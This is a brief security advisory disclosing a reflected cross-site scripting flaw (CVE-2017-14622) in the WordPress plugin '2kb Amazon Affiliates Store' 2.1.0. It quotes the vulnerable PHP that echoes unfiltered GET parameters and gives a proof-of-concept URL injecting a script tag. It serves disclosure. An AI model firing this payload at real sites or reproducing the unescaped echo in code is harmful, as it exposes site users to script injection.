Cross-site scripting located in the plugin “2kb Amazon Affiliates Store” version 2.1.0 of wordpress (https://es.wordpress.org/plugins/2kb-amazon-affiliates-store/).
The absence of a correct filtering in the variables “page” and “kbAction” allows code injection using the GET method.
<input type="hidden" name="page" value="<?php echo $_GET['page'];?>"/> <input type="hidden" name="kbAction" value="<?php echo $_GET['kbAction'];?>"/>
Example of injection:
http://localhost/wordpress/wp-admin/admin.php?page=kbAmz&kbAction=demo”><script>alert(1234)</script>
- Developer’s appreciation:
https://es.wordpress.org/plugins/2kb-amazon-affiliates-store/#developers - Publication in Packetstormsecurity:
https://packetstormsecurity.com/files/144261/WordPress-2kb-Amazon-Affiliates-Store-2.1.0-Cross-Site-Scripting.html - CVE:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14622